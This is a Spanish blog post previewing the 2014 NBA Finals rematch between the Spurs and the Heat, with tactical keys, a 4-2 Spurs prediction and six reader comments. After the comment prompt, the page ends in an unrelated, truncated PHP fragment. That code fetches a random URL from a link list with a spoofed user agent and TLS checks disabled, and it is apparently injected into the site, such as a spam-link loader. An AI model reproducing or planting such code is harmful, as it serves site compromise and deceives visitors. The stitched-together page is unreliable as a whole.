PO 2014: Previa de las Finales

05 de June de 2014 por TheDeerHunter

“No es una revancha. Es una secuela”

Admito que la frase no es mía, pero no puede ser más acertada… y más hermosa. Hace apenas un año loábamos una de las mejores finales de la NBA de todos los tiempos. Los dramáticos acontecimientos que se resolvieron en aquellos 7 maravillosos partidos no merecían terminar con un ganador y un perdedor. Quedaron asuntos por resolver. El más importante de todos es “¿son los Heat superiores a los Spurs?” Se llevaron el primer asalto, sí, pero se puede decir que los texanos fueron sutilmente superiores hasta aquel triple milagroso de Ray Allen y el conato de entrega de anillo.

En una liga donde la última repetición de finales tuvo lugar en 1998 entre Bulls y Jazz el desarrollo de los acontecimientos apuntó muy pronto a esta posibilidad. Los Spurs han estado más sólidos, si cabe, que nunca, y los Heat han dominado con suficiencia y hasta cierta apatía su conferencia. Casi se podría decir que ambos se han tomado la regular como un entrenamiento con vistas a este instante y al resto de rivales como meros sparrings. Aparentemente hemos visto al equipo de Popovich un peldaño por encima y no en vano una de las principales diferencias respecto a la final del año pasado es la ventaja de campo, que les favorece a ellos. Otra es que ninguno de sus jugadores promedió ni 30 minutos en la regular, así que a priori llegan más enteros físicamente a pesar de haber disputado unos playoffs significativamente más duros. Los dos antecedentes de este curso dan un empate.

Algunos pensamos que un campeón siempre es favorito mientras no se demuestre lo contrario. En esta ocasión sin embargo los Spurs se sitúan levemente por delante en las quinielas por razones evidentes. La igualdad que vimos el año pasado y la evolución de unos y otros nos invita a pensar que LeBron James y los suyos lo van a tener más difícil que nunca para ganar el anillo. Con todo, seguro que serán los pequeños detalles y los imponderables los que terminarán decantando la balanza de una, esperamos, fabulosa final. 

Claves de la eliminatoria

  • El estado físico de Tony Parker: Preocupación máxima por las molestias del francés, que le obligaron a sentarse en una situación tan crítica como el sexto partido en Oklahoma. La parte positiva es que ha tenido unos días extra de descanso. También parece que su equipo depende menos de él que nunca, pero es evidente que sin su concurso los Spurs pierden una gran baza.
  • El mejor equipo asistente contra el mayor ladrón: Un dato curioso. Los Heat firman un balance perdedor cuando el ratio de pérdidas forzadas no supera el 13% de las posesiones rivales. Los Spurs son el peor equipo posible para testear esa estadística, pero eso no quiere decir que sean inmunes. La presencia de Parker en este aspecto vuelve a resultar decisiva.
  • El temible abanico táctico de los Spurs: Aparentemente Ginobili, a diferencia del año pasado, llega en un estado de forma extraordinario y eso es fundamental para los intereses de su equipo. Más fundamental, si cabe, puede resultar en esta serie Boris Diaw que fue una pesadilla para los Thunder. Popovich tiene buenas cartas en su mano, y suele utilizarlas bien.
  • La intendencia (y la flor) de los campeones: Tradicionalmente los Heat han sabido sacar petróleo de varios veteranos y tapados en los momentos más críticos. Ray Allen es Ray Allen… y Rashard Lewis viene cargadísimo de moral tras su actuación en la pasada eliminatoria. ¿Hará falta más?

Pronóstico

4-2 Spurs. Creo sinceramente que este año los Spurs tienen muchos más mimbres que los Heat. Además vienen entrenados contra unos rivales de idiosincrasia muy similar. Igual que hacía falta mucho más que Durant y Westbrook para derrotarles en las finales de conferencia, hará falta mucho más que Lebron James y Dwyane Wade para dejarles sin anillo.

Comenta

6 comentarios a esta entrada

  1. r_miller dice:
    #1

    Aunque en general los spurs tienen mejor juego esta claro que Miami no solo es Wade y Lebron, Bosh es un buen jugador que te puede promediar un 15-8 en las series, sumando la energia de cole, chalmers, andersen, la intendencia de battier y el tiro mortifero de allen y lewis en un gran equipo y no solo 2 jugadores. Por otro lado si Leonard, el unico probablemente que pueda parar a Lebron le seca, miami se queda muy cojo, pero si un dia ginobili no esta acertado no repercutira tanto si los demas estan mas o menos bien. Lebron es el 50% del equipo y aunque no anote es muy peligroso.

      Citar

  2. Ruxixon dice:
    #2

    Yo es que veo a Ginobili dando muchos minutos de calidad,y mi feeling es que va a ser el elemento diferenciador de la eliminatoria.Eso supondría minutadas para los hombres importantes de Miami,LeBron y Wade,si Battier o Norris Cole como miembros de la segunda unidad no están finos en la defensa.Luego Bosh no podrá sacar tanto partido de tirar liberado,no hay un Hibbert en San Antonio.Lo veo muy complicado para Miami y si ganan será el mayor logro de LeBron desde que está en la NBA,3 anillos seguidos y derrotando en este último al considerado por los expertos el gran favorito (y en menos de 7 partidos).

      Citar

  3. rumbero dice:
    #3

    The heat beat the Heat . Esto empieza como el año pasado. No se si pueden pasar más cosas en un Game 1

      Citar

  4. Mamba_Blanca dice:
    #4

    Jugada maestra de Popovich estropeando el aire acondicionado antes del partido, se comenta que hay una foto de el introduciendo un destornillador en la maquina minutos antes de que comenzase el encuentro.

      Citar

  5. ratta-blanka dice:
    #5

    hubo otra final que se repito entre celtics y lakers en 2007-2008, 2008-2009

      Citar

  6. TheDeerHunter dice:
    #6

    ratta-blanka:
    hubo otra final que se repito entre celtics y lakers en 2007-2008, 2008-2009

    No es correcto. En el 2009 los Lakers se enfrentaron a Orlando y no a Celtics. La revancha del 2008 llegó en el 2010.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>